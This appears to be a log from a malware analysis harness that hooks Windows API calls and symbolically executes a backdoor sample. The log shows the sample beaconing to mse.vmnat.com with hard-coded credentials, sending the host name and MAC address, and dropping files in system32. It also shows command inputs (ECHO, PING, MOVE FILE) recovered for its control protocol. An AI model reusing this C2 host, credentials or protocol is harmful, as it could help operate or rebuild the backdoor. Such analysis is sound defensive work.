 File initialization completed
 HookSetReg triggered
 HookGetPid triggered
 InterceptVirtualAlloc triggered, ADDRESS: 003d0000
 SkipOtherCreateRemoteThread triggered
 Intercepted LoadLibraryA(Kernel32.dll)
 Intercepted LoadLibraryA(wininet.dll)
 Intercepted LoadLibraryA(ws2_32.dll)
 Intercepted GetProcAddress(MessageBoxA)
 Intercepted GetProcAddress(htons)
 Intercepted GetProcAddress(ntohs)
 Intercepted GetProcAddress(InternetOpenUrlA)
 Intercepted GetProcAddress(InternetConnectA)
 Intercepted GetProcAddress(HttpSendRequestA)
 Intercepted GetProcAddress(InternetCloseHandle)
 Intercepted GetProcAddress(CloseHandle)
 Intercepted GetProcAddress(FindNextFileA)
 Intercepted GetProcAddress(GetDriveTypeA)
 Intercepted GetProcAddress(WinExec)
 Intercepted GetProcAddress(DeleteFileA)
 Intercepted GetProcAddress(RemoveDirectoryA)
 Intercepted GetProcAddress(TerminateThread)
 Intercepted GetProcAddress(RegOpenKeyExA)
 Intercepted GetProcAddress(RegCloseKey)
 Thread initialization phase finished. Entering the main loop. Hooking internet library functions.
 Intercepted InternetOpenUrlA(005FA608, http://mse.vmnat.com/httpdocs/mm/WIN-R4MEJK3CJAC:52-54-00-12-34-56/Cmwhite, (null), 0x0, 0x84000100, 00000000)
 Intercepted InternetCloseHandle(005FA618)
 Intercepted LoadLibraryA(Kernel32.dll)
 Intercepted LoadLibraryA(wininet.dll)
 Intercepted GetProcAddress(InternetOpenA)
 Intercepted GetProcAddress(InternetReadFile)
 Intercepted GetProcAddress(HttpOpenRequestA)
 Intercepted GetProcAddress(HttpEndRequestA)
 Intercepted GetProcAddress(CreateFileA)
 Intercepted GetProcAddress(GetFileSize)
 Intercepted GetProcAddress(Sleep)
 Intercepted GetProcAddress(HttpQueryInfoA)
 Intercepted InternetConnectA(005FA608, mse.vmnat.com, 80, reader, 1qazxsw2, 3, &d, 00000000)
 Intercepted HttpSendRequestA(005FA628, (null), 0, 57494E2D52344D454A4B33434A41433A35322D35342D30302D31322D33342D35362F74737C6B7770716B727D6B777576484F302B2E2B2A322B484F747770777F7571757C484F067F19122C2B212A323619363C36312028767719322C2B262A286
 Intercepted InternetCloseHandle(005FA628)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA628, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 state 0x0x7fbf347ae010 in ECHO command
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA638, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted InternetReadFile(005FA618, 01854B8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA618)
 Intercepted LoadLibraryA(Kernel32.dll)
 Intercepted LoadLibraryA(wininet.dll)
 Intercepted GetProcAddress(InternetOpenA)
 Intercepted GetProcAddress(InternetReadFile)
 Intercepted GetProcAddress(HttpOpenRequestA)
 Intercepted GetProcAddress(HttpEndRequestA)
 Intercepted GetProcAddress(CreateFileA)
 Intercepted GetProcAddress(GetFileSize)
 Intercepted GetProcAddress(Sleep)
 Intercepted GetProcAddress(HttpQueryInfoA)
 Intercepted CreateFileA(C:\Windows\system32\sys32time.ini)
 Intercepted CreateFileA(C:\Windows\system32\ipop.dll)
 Intercepted InternetConnectA(005FA608, mse.vmnat.com, 80, reader, 1qazxsw2, 3, &d, 00000000)
 Intercepted HttpSendRequestA(005FA648, (null), 0, 57494E2D52344D454A4B33434A41433A35322D35342D30302D31322D33342D35362F74737C6B7770716B727D6B777576484F302B2E2B2A322B484F747770777F7571757C484F067F19122C2B212A323619363C36312028767719322C2B262A286
 Intercepted InternetCloseHandle(005FA648)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA648, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 state 0x0x7fbf35b448d0 in ECHO command
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA658, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted InternetReadFile(005FA618, 01854B8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA618)
 Intercepted LoadLibraryA(Kernel32.dll)
 Intercepted LoadLibraryA(wininet.dll)
 Intercepted GetProcAddress(InternetOpenA)
 Intercepted GetProcAddress(InternetReadFile)
 Intercepted GetProcAddress(HttpOpenRequestA)
 Intercepted GetProcAddress(HttpEndRequestA)
 Intercepted GetProcAddress(CreateFileA)
 Intercepted GetProcAddress(GetFileSize)
 Intercepted GetProcAddress(Sleep)
 Intercepted GetProcAddress(HttpQueryInfoA)
 Intercepted CreateFileA(C:\Windows\system32\sys32time.ini)
 Intercepted CreateFileA(C:\Windows\system32\ipop.dll)
 Intercepted InternetConnectA(005FA608, mse.vmnat.com, 80, reader, 1qazxsw2, 3, &d, 00000000)
 Intercepted HttpSendRequestA(005FA688, (null), 0, 57494E2D52344D454A4B33434A41433A35322D35342D30302D31322D33342D35362F74737C6B7770716B727D6B777576484F302B2E2B2A322B484F747770777F7571757C484F067F19122C2B212A323619363C36312028767719322C2B262A286
 Intercepted InternetCloseHandle(005FA688)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA658, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted InternetReadFile(005FA618, 01854B8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA618)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Clnpp5.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA688, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 state 0x0x7fbdecc1c0d0 in _real_ command dispatcher
 PING COMMAND
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA698, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA698, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)
 MOVE FILE COMMAND
 Intercepted htons
 Intercepted MoveFileA
0x0
BaseInstructions: SymbExpression MoveFileA NewFileName - (Concat w32 (Extract w8 24 N0:(SExt w32 N1:(Extract w8 0 (Or w32 (And w32 (Xor w32 (Or w32 (And w32 (ZExt w32 (Read w8 0xc v2_InternetReadFile_8_7))
0xff)
0x71569500)
(Or w32 (And w32 (ZExt w32 (Extract w8 0 (Or w32 (And w32 (ZExt w32 (Concat w16 (Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0x5 v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500))
(Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0x4 v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500))))
0xffffff00)
(And w32 (ZExt w32 (Read w8 (Extract w32 0 (Add w64 0xffff8040d217b380
(Or w64 (And w64 (Add w64 0x78830000
(ZExt w64 (Add w32 0x1854b95
(And w32 (Concat w32 (Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0xb v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500))
(Concat w24 (Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0xa v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500))
(Concat w16 (Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0x9 v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500))
(Extract w8 0 (Or w32 (And w32 (Xor w32 0x1853745
(Or w32 (And w32 (ZExt w32 (Read w8 0x8 v1_InternetReadFile_4_1))
0xff)
0x71569500))
0xff)
0x71569500)))))
0xff))))
0xfff)
0x7fbf2de84000)))
const_arr4))
0xff))))
0xff)
0x1854900))
0xff)
0x71569500))))
(Concat w24 (Extract w8 16 N0)
(Concat w16 (Extract w8 8 N0) N1)))
BaseInstructions: SymbExpression MoveFileA NewFileName - Value: 0x40

 Intercepted HookInternetOpenA. Agent: (null)
 Intercepted HttpOpenRequestA(005FA618, POST, /cgi-bin/Rwpq1.cgi, HTTP/1.1, (null), 0x0, 00000000)
 Intercepted InternetReadFile(005FA698, 01855F8C, 4096, 018549EC)
 Intercepted InternetCloseHandle(005FA608)

 *** INPUT *** 
 v0_InternetReadFile_0_0 = {0x5, 0x5, 0x44, 0x5, 0x0, 0x0, 0x5, 0x5, 0x5, 0x7d, 0x75, 0x71, 0x75, 0x61, 0x6c, 0x45, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5}; (string) "..D......}uqualE.................................."
v1_InternetReadFile_4_1 = {0x5, 0x5, 0x44, 0x75, 0x0, 0x0, 0x75, 0x75, 0xb5, 0x7d, 0x75, 0x71, 0x75, 0x61, 0x6c, 0x45, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75}; (string) "..Du..uu.}uqualEuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu"
v2_InternetReadFile_8_7 = {0x5, 0x5, 0x42, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5, 0x5}; (string) "..B..............................................."
